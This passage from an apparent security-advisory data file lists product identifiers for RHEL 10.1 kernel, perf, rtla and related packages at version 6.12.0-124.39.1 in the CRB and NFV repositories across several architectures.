"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
